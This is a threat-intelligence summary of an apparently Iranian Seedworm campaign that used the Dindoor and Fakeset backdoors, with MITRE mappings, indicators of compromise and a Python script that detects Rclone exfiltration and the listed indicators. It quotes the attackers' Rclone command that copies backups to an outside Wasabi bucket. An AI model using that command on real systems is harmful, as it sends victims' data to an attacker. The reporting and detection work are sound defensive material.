Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company

Seedworm (aka MuddyWater/Temp Zagros/Static Kitten) has been observed active on multiple U.S. corporate and NGO networks since February 2026, deploying novel backdoors (Dindoor, built on the Deno runtime, and the Python-based Fakeset) and attempting exfiltration via Rclone to cloud storage. The activity involved signed malware (certificates issued to “Amy Cherne” and “Donald Gay”), payload hosting on Backblaze S3 endpoints, and links to previously observed Stagecomp/Darkcomp activity, indicating a coordinated Iranian espionage campaign with potential for disruptive follow-on attacks. #Seedworm #Dindoor

Keypoints

  • Seedworm intrusions were detected on networks of a U.S. bank, an airport, a U.S. software company’s Israeli office, and a Canadian non-profit starting February 2026 and continuing after recent U.S./Israeli strikes on Iran.
  • Researchers discovered a previously unknown Deno-based backdoor named Dindoor (signed with a certificate issued to “Amy Cherne”) on multiple victim networks and a separate Python backdoor, Fakeset (signed with certificates issued to “Amy Cherne” and “Donald Gay”).
  • Attempted data exfiltration using Rclone to a Wasabi cloud storage bucket was observed for the software company; payloads and backdoors were also hosted on Backblaze S3 endpoints (gitempire and elvenforest buckets).
  • Certificate reuse links this activity to other Seedworm-linked tooling (Stagecomp/Darkcomp), suggesting the same actor even though some of those malware families were not observed on the target networks.
  • Iran-aligned hacktivist and state-linked groups (Handala, Druidfly, Damselfly, Marshtreader/Mantis) have conducted DDoS, wiper, spear-phishing, and reconnaissance operations in recent months, raising risk of disruptive or destructive attacks amid the current conflict.
  • Defensive recommendations include enhanced monitoring for credential attacks and exfiltration (large outbound transfers, Rclone usage), deploying WAF/DDoS protection, enforcing MFA and conditional access, patching internet-facing services, and isolating backups to prepare for potential destructive operations.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Malicious Office attachments were used to deliver the Phoenix backdoor: (‘The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix’).
  • [T1566.003] Spearphishing via Service / Compromised Mailbox – A compromised mailbox was used to distribute a custom backdoor: (‘used a compromised mailbox to distribute a custom backdoor known as Phoenix’).
  • [T1110.003] Password Spraying – Password-spraying attacks were observed against Israeli municipal government entities: (‘a successful password-spraying attack conducted from Nord VPN infrastructure against Israeli municipal government entities’).
  • [T1190] Exploit Public-Facing Application – Scanning and exploitation of camera vulnerabilities was performed using known CVEs to gather intelligence: (‘scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921’).
  • [T1595.002] Active Scanning / Vulnerability Scanning – Widespread scanning activity against exposed targets and API endpoints was observed as reconnaissance: (‘Scanning activity against exposed API endpoints’).
  • [T1499] Endpoint Denial of Service (DDoS) – Pro-Palestinian hacktivists and other actors mounted high-volume DDoS attacks using amplification and SYN/RST floods: (‘high-volume DDoS attacks … including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks’).
  • [T1485] Data Destruction – Wiper malware has been used in destructive operations historically and in recent attacks (e.g., BibiWiper, Shamoon): (‘wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer’).
  • [T1567.002] Exfiltration to Cloud Storage – Data exfiltration attempts used Rclone to copy backups to a Wasabi cloud bucket: (‘rclone copy CSIDL_DRIVE_FIXEDbackups wasabi:[REMOVED]:/192.168.0.x’).
  • [T1219] Remote Access Tools – Legitimate remote access tools and RATs were hosted/used for persistence and remote control (PDQ, AnyDesk, ScreenConnect): (‘the C&C server also reportedly hosted the PDQ remote access tool’ and ‘Use of the remote desktop tools AnyDesk and ScreenConnect’).
  • [T1078] Valid Accounts – Compromised mailboxes and credential harvesting were used to facilitate distribution and access: (‘used a compromised mailbox to distribute a custom backdoor’ and multiple campaigns focused on credential theft and mailbox compromise).
  • [T1553] Subvert Trust Controls (Code Signing Abuse) – Malware samples were signed with certificates issued to named individuals, indicating abuse of code-signing trust: (‘This backdoor was signed with a certificate issued to “Amy Cherne”’ and ‘Fakeset was signed by certificates issued to “Amy Cherne” and “Donald Gay”’).

Indicators of Compromise

  • [File Hashes] Malware samples observed on victim networks – examples: 0f9cf1cf8d641562053ce533aaa413754db88e60 (Trojan.Dindoor), 15061036c702ad92b56b35e42cf5dc334597e73 (Trojan.Fakeset), and many other Dindoor/Fakeset/Stagecomp/Darkcomp hashes.
  • [Domains / URLs] Hosting and distribution endpoints – examples: gitempire.s3.us-east-005.backblazeb2[.]com, elvenforest.s3.us-east-005.backblazeb2[.]com, and other domains including uppdatefile[.]com, serialmenot[.]com, moonzonet[.]com.
  • [Code-signing Certificate Subjects] Certificates used to sign malware – examples: subjects “Amy Cherne” and “Donald Gay” (both used to sign observed backdoors and samples linked to Seedworm activity).
  • [Tools / Filenames] Tools and commands observed in exfiltration or execution – examples: Rclone command used to Wasabi (‘rclone copy CSIDL_DRIVE_FIXEDbackups wasabi:[REMOVED]:/192.168.0.x’) and Deno runtime used by Dindoor to execute payloads.
  • [Cloud Storage Buckets] Cloud exfiltration/hosting targets – example: Wasabi cloud storage bucket used as an exfiltration target (bucket name redacted in reporting) and Backblaze S3 buckets used to host payloads (gitempire/elvenforest endpoints).
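The defensive recommendation in the key points (monitor for Rclone usage and large outbound transfers) and the indicator list above can be turned into a small detection pass over endpoint telemetry. The following is an added example, not code from the report or from the page; it uses the domains, the complete Dindoor SHA-1 and the certificate subjects listed on the page, while the log line format, host names, timestamps and the Wasabi bucket name (redacted in the reporting, so a placeholder here) are constructed for illustration.

```python
"""Added example (not from the report): flag Rclone transfers to a cloud remote
and match page-listed Seedworm indicators against constructed log lines."""
import re
from dataclasses import dataclass

# Indicators taken from the page; the domains are de-fanged there and re-fanged here.
IOC_DOMAINS = {
    d.replace("[.]", ".")
    for d in (
        "gitempire.s3.us-east-005.backblazeb2[.]com",
        "elvenforest.s3.us-east-005.backblazeb2[.]com",
        "uppdatefile[.]com",
        "serialmenot[.]com",
        "moonzonet[.]com",
    )
}
IOC_SHA1 = {"0f9cf1cf8d641562053ce533aaa413754db88e60"}  # Trojan.Dindoor (from the page)
IOC_SIGNERS = {"Amy Cherne", "Donald Gay"}  # code-signing subjects from the page

# An rclone invocation with a transfer verb followed by a destination written as a
# named remote ("wasabi:bucket/path"), the shape of the command quoted on the page.
# The remote name must be at least two characters so Windows drive letters ("C:")
# in the source path are not mistaken for a remote.
RCLONE_XFER = re.compile(
    r"\brclone(?:\.exe)?\b.*?\b(copy|sync|move|copyto|moveto)\b.*?\s([A-Za-z0-9_-]{2,}):",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Alert:
    line_no: int
    rule: str
    detail: str


def rclone_cloud_transfer(text):
    """Return (verb, remote) when text contains an rclone transfer to a named remote."""
    m = RCLONE_XFER.search(text)
    return (m.group(1).lower(), m.group(2)) if m else None


def ioc_hits(text):
    """Return (kind, value) pairs for every page-listed indicator present in text."""
    hits = []
    lowered = text.lower()
    for d in sorted(IOC_DOMAINS):
        if d in lowered:  # plain substring match; tighten with boundaries if needed
            hits.append(("domain", d))
    for h in sorted(IOC_SHA1):
        if h in lowered:
            hits.append(("sha1", h))
    for s in sorted(IOC_SIGNERS):
        if s in text:  # subject names are matched case-sensitively as printed
            hits.append(("signer", s))
    return hits


def scan(lines):
    """Run both checks over an iterable of log lines and collect alerts in order."""
    alerts = []
    for n, line in enumerate(lines, 1):
        xfer = rclone_cloud_transfer(line)
        if xfer:
            alerts.append(Alert(n, "rclone_cloud_transfer", f"{xfer[0]} -> {xfer[1]}:"))
        for kind, value in ioc_hits(line):
            alerts.append(Alert(n, f"ioc_{kind}", value))
    return alerts


# Constructed sample telemetry (not real logs). Line 5 is a negative case: rclone
# listing a local path without a transfer verb should not fire.
SAMPLE_LOGS = [
    '2026-03-02T10:14:03Z host=WS-17 event=ProcessCreate image=C:\\Tools\\rclone.exe '
    'cmdline="rclone copy C:\\backups wasabi:placeholder-bucket/192.168.0.x"',
    '2026-03-02T10:15:10Z host=WS-17 event=DnsQuery name=gitempire.s3.us-east-005.backblazeb2.com',
    '2026-03-02T10:16:00Z host=WS-17 event=ProcessCreate image=C:\\Windows\\notepad.exe '
    'cmdline="notepad.exe C:\\notes.txt"',
    '2026-03-02T10:17:22Z host=WS-17 event=FileCreate '
    'sha1=0f9cf1cf8d641562053ce533aaa413754db88e60 signer="Amy Cherne"',
    '2026-03-02T10:18:00Z host=WS-17 event=ProcessCreate image=C:\\Tools\\rclone.exe '
    'cmdline="rclone lsd C:\\backups"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f"line {a.line_no}: {a.rule} ({a.detail})")
```

Running the block reports four alerts: the Rclone copy to the `wasabi:` remote on line 1, the Backblaze hosting domain on line 2, and both the Dindoor hash and the “Amy Cherne” signer on line 4; the `rclone lsd` listing on line 5 is not flagged. In production the same two checks would be fed from process-creation, DNS and file-creation events, and the Rclone rule is the more durable of the two, since hashes and domains rotate while exfiltration through a renamed or freshly compiled Rclone still has to name a remote.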

Read more: https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us